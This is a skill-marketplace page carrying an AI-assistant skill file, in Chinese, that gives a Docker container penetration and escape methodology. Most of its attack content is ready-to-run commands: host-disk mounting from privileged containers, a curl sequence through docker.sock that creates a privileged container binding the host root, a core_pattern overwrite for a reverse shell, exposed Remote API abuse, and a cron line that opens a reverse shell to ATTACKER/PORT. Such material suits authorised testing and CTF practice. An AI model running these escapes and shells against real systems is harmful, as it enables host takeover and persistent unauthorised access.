ワンクリックでManusで任意のスキルを実行

docker-pentesting

スター1,493

フォーク229

更新日2026年5月21日 08:38

Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能

インストール

Codex または Claude でインストールこの Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。

Manusで実行

ソース

wgpsec

wgpsec/AboutSecurity

GitHub リポジトリを開く Creator のリポジトリを見る

ダウンロード

Manusで実行

関連職種SOC

SOC 職業分類に基づく

情報セキュリティアナリストコンピュータ・数学職·SOC 15-1212

ファイルエクスプローラー

4 ファイル

SKILL.md

readonly

このリポジトリの他の Skills

同じリポジトリ

azure-pentesting

wgpsec/AboutSecurity

Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产（Blob Storage/App Service/Azure VM/Azure Functions）、获取 Azure 凭据（Service Principal/Managed Identity/Access Token）、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面

2026-06-211.5k

gcp-exploit

wgpsec/AboutSecurity

GCP 云环境攻击方法论。当目标使用 Google Cloud Platform、发现 GCP Service Account/Metadata/Storage Bucket 时使用。覆盖 Metadata 服务利用、Service Account 密钥窃取、IAM 提权、GKE 逃逸、Storage Bucket 枚举

2026-05-211.5k

gcp-pentesting

wgpsec/AboutSecurity

GCP 云环境渗透测试总体方法论。当目标使用 Google Cloud Platform、发现 GCP 相关资产（GCS Bucket/Compute Engine/Cloud Functions/GKE）、获取 GCP 凭据（Service Account Key/OAuth Token/Metadata Token）、或需要对 GCP 环境进行安全评估时使用。提供从未授权枚举到提权、后渗透、GCP-to-Workspace 穿越的全流程决策树。覆盖 37+ GCP 服务攻击面

2026-05-211.5k

serverless-attack

wgpsec/AboutSecurity

Serverless/云函数安全测试与攻击。当目标涉及 AWS Lambda、腾讯云 SCF、阿里云 FC、Azure Functions 等 Serverless 服务时使用。当发现 API Gateway 后端是 Lambda/SCF 触发、通过 cloud-aksk-exploit 获取到函数操作权限、或需要分析云函数代码中的漏洞时使用。覆盖事件注入（HTTP/OSS/消息队列触发器参数篡改）、环境变量泄露（硬编码凭据提取）、函数代码注入/覆盖（UpdateFunctionCode）、Runtime 利用（/tmp 写入/Layer 劫持/依赖投毒）、临时凭据滥用。发现任何 Lambda/SCF/云函数、API Gateway、或 Serverless 架构时都应使用此 skill

2026-05-211.5k

tencent-pentesting

wgpsec/AboutSecurity

腾讯云渗透测试方法论。当目标使用腾讯云服务、发现 cos.*.myqcloud.com 资产、获取腾讯云 SecretId/SecretKey、在 CVM 实例内可访问 metadata.tencentyun.com 元数据、或需要对腾讯云 CAM/CVM/COS/TencentDB/TKE/SCF 等服务进行安全评估时使用。覆盖 CAM 提权、CVM 接管、COS 对象存储利用、TencentDB 数据库攻击、TKE 容器集群、SCF 云函数、CLB 负载均衡、CLS 日志服务、KMS 密钥管理

2026-05-211.5k

java-injection-audit

wgpsec/AboutSecurity

Java 源码注入类漏洞审计。当在 Java 白盒审计中需要检测注入类漏洞时触发。覆盖 6 种注入: SQL 注入(JDBC/MyBatis/Hibernate/JPA)、命令注入(Runtime.exec/ProcessBuilder)、 SSRF(HttpURLConnection/OkHttp/RestTemplate)、LDAP 注入、SpEL/OGNL 表达式注入、NoSQL 注入(MongoDB)。需要 java-audit-pipeline 提供的数据流证据(EVID_*)作为审计输入。

2026-05-211.5k

name	docker-pentesting
description	Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能
metadata	{"tags":"docker,container,registry,image,container escape,逃逸,容器,镜像层,docker.sock,docker api,cgroup,runc,namespace,procfs,core_pattern,capabilities,dirtycow,dirtypipe","category":"cloud","mitre_attack":"T1611,T1610,T1613"}

Docker 安全测试与容器渗透

Docker 攻击面不只有逃逸：容器配置、Docker Daemon、Registry、镜像层、构建上下文和宿主机共享内核都会形成不同的突破路径。先判断自己处在容器内、宿主机用户态还是远程 Registry/API 视角，再选择逃逸、凭据提取或供应链横向。

深入参考

容器逃逸方法的完整 payload 和利用条件 → 读 references/escape-methods.md
Docker Registry、镜像层和构建产物 Secret 分析 → 读 references/registry-and-image-analysis.md
Docker Build Context 滥用（CI/CD 场景的路径穿越与 Secret 泄露）→ 读 references/escape-methods.md 第 12 节

Phase 1: 攻击面确认

# 确认在容器中
cat /proc/1/cgroup 2>/dev/null | grep -qi docker && echo "IN DOCKER"
ls /.dockerenv 2>/dev/null && echo "IN DOCKER"
cat /proc/1/sched | head -1    # PID 1 不是 systemd/init → 容器

# 基础信息
hostname
cat /etc/os-release
uname -r    # 内核版本（宿主机共享）

Phase 2: 逃逸条件检查清单

按成功率排序检查：

# 1. 特权容器？（最简单的逃逸）
cat /proc/1/status | grep CapEff
# 0000003fffffffff = 特权容器（拥有全部 capabilities）

# 2. Docker Socket 挂载？
ls -la /var/run/docker.sock 2>/dev/null

# 3. procfs 挂载？（core_pattern 逃逸）
# 检查是否一个在 /proc 下、一个在其他挂载路径下
find / -name core_pattern 2>/dev/null

# 4. Docker Remote API 暴露？
# 推测宿主机 IP：优先 hostname -I 取同网段 .1，为空则用 ip route 默认网关
GW=$(hostname -I 2>/dev/null | awk '{print $1}' | awk -F. '{print $1"."$2"."$3".1"}')
[ -z "$GW" ] && GW=$(ip route 2>/dev/null | awk '/default/{print $3}')
timeout 3 bash -c "echo >/dev/tcp/$GW/2375" 2>/dev/null && echo "DOCKER API EXPOSED on $GW:2375"

# 5. 宿主机目录挂载？
mount | grep -v 'overlay\|proc\|sys\|cgroup\|tmpfs\|devpts\|mqueue'
cat /proc/mounts | grep -E '^/dev/'

# 6. Docker 用户组提权？（宿主机场景）
groups | grep docker || id | grep docker
cat /etc/group | grep docker

# 7. 危险 Capabilities？
cat /proc/1/status | grep Cap
# python3 解码: python3 -c "import struct;print(bin(struct.unpack('Q',bytes.fromhex('CAPEFF_HEX'))[0]))"
# 关注: CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_DAC_OVERRIDE, CAP_NET_ADMIN

# 8. PID namespace 共享？
ls /proc/*/exe 2>/dev/null | head -20
# 能看到大量非容器进程 → hostPID=true

# 9. 网络共享？
ip addr
# 能看到宿主机网卡(eth0 有宿主机 IP) → hostNetwork=true

# 10. 内核版本（判断可利用的 CVE）
uname -r
# 内核版本对照:
# 2.6.22 - 2016.10修复  → DirtyCow (CVE-2016-5195，几乎所有 2016 年前的内核)
# 4.6 - 5.9            → CVE-2020-14386
# >= 5.8 各稳定分支    → DirtyPipe (CVE-2022-0847)
#   修复版本: 5.16.11, 5.15.25, 5.10.102, 5.4.181
# 5.8.0 - 5.16         → CVE-2022-23222 (BPF)
# 2.6.19 - 5.12        → CVE-2021-22555 (Netfilter)
# Ubuntu 14.04-20.10   → OverlayFS (CVE-2021-3493)

# 11. 环境变量泄露？
env | sort
cat /proc/self/environ | tr '\0' '\n'

# 12. docker-compose 配置泄露？
find / -name "docker-compose*" 2>/dev/null

# 13. Registry / 镜像凭据？
cat ~/.docker/config.json 2>/dev/null
find / -path '*/.docker/config.json' 2>/dev/null

Phase 3: Docker 攻击决策树

检查结果？
├─ 特权容器 → 挂载宿主机磁盘 / cgroup release_agent / nsenter（需 hostPID）
├─ Docker Socket → 创建特权容器逃逸（docker CLI 或 curl，详见 references）
├─ procfs 挂载 → core_pattern 管道符反弹 shell
├─ Docker Remote API 暴露 → 远程创建特权容器
├─ 宿主机目录挂载
│   ├─ /etc → 写 crontab/SSH key
│   └─ 其他目录 → 读写宿主机文件
├─ Docker 用户组（宿主机用户在 docker 组）→ docker run -v /:/host
├─ CAP_SYS_ADMIN → cgroup 逃逸 / mount
├─ CAP_SYS_PTRACE + hostPID → 注入宿主机进程
├─ CAP_DAC_READ_SEARCH → shocker / 配合 DirtyPipe
├─ hostNetwork → 访问宿主机服务/Metadata API
├─ 运行时 CVE（runc/containerd 版本过旧）→ CVE-2019-5736, CVE-2019-16884, CVE-2020-15257
├─ Registry 暴露或有镜像凭据 → 枚举仓库/tag/blob，分析镜像层 Secret
├─ 信息收集（不直接逃逸但发现关键信息）
│   ├─ 环境变量 → 可含数据库密码、API Key、云凭证
│   ├─ Docker Registry / 镜像层 → 可含历史 Secret、kubeconfig、源码和制品 Token
│   └─ docker-compose.yml → 可含密码、挂载点、网络配置
└─ 以上都没有 → 内核漏洞（按版本匹配 CVE）
    ├─ >= 5.8 未修复  → DirtyPipe (CVE-2022-0847)
    ├─ 2.6.22+ 2016前 → DirtyCow (CVE-2016-5195)
    ├─ 5.8-5.16       → BPF 绕过 (CVE-2022-23222)
    ├─ 2.6.19-5.12    → Netfilter (CVE-2021-22555)
    └─ Ubuntu 14-20   → OverlayFS (CVE-2021-3493)
详细命令 → [references/escape-methods.md](references/escape-methods.md)

Phase 4: 快速逃逸命令

特权容器（成功率 99%）

mkdir -p /tmp/host && mount /dev/sda1 /tmp/host
cat /tmp/host/root/flag.txt
# 或 chroot /tmp/host bash

Docker Socket（成功率 95%）

# 无 docker CLI 时用 curl（完整流程：查镜像 → 创建 → 启动 → 读日志）
SOCK=/var/run/docker.sock
IMAGE=$(curl -s --unix-socket $SOCK http://localhost/images/json | python3 -c "import json,sys;imgs=json.load(sys.stdin);print(imgs[0]['RepoTags'][0] if imgs else 'alpine')")
CID=$(curl -s --unix-socket $SOCK -X POST -H "Content-Type: application/json" \
  http://localhost/containers/create \
  -d "{\"Image\":\"$IMAGE\",\"Cmd\":[\"cat\",\"/mnt/root/flag.txt\"],\"HostConfig\":{\"Binds\":[\"/:/mnt\"],\"Privileged\":true}}" \
  | python3 -c "import json,sys;print(json.load(sys.stdin)['Id'])")
curl -s --unix-socket $SOCK -X POST http://localhost/containers/$CID/start
sleep 2
curl -s --unix-socket $SOCK "http://localhost/containers/$CID/logs?stdout=true&stderr=true"

procfs 挂载（core_pattern）

# 前提：宿主机 procfs 已挂载到容器中
# 找到容器在宿主机的绝对路径（从 upperdir 取父目录拼 /merged）
upperdir=$(sed -n 's/.*\bupperdir=\([^,]*\).*/\1/p' /proc/mounts)
host_path=$(dirname "$upperdir")/merged
# 写反弹 shell + 覆盖 core_pattern + 触发崩溃
echo -e "|${host_path}/tmp/.t.py \rcore " > /host/proc/sys/kernel/core_pattern

Docker Remote API

# 获取宿主机 IP（优先 hostname -I 推测，为空则用 ip route 网关）
GW=$(hostname -I 2>/dev/null | awk '{print $1}' | awk -F. '{print $1"."$2"."$3".1"}')
[ -z "$GW" ] && GW=$(ip route 2>/dev/null | awk '/default/{print $3}')
docker -H tcp://$GW:2375 run -v /:/mnt -it alpine chroot /mnt bash

写 Crontab 逃逸

# 如果挂载了 /etc 或 /var/spool/cron
echo "* * * * * root bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'" > /host_etc/cron.d/pwn

Docker 用户组提权（宿主机场景）

# 当前用户在 docker 组即可
docker run -v /:/host -it alpine chroot /host sh

工具

工具	用途
CDK	容器逃逸自动化检测+利用
deepce	Docker 枚举脚本
amicontained	容器环境检测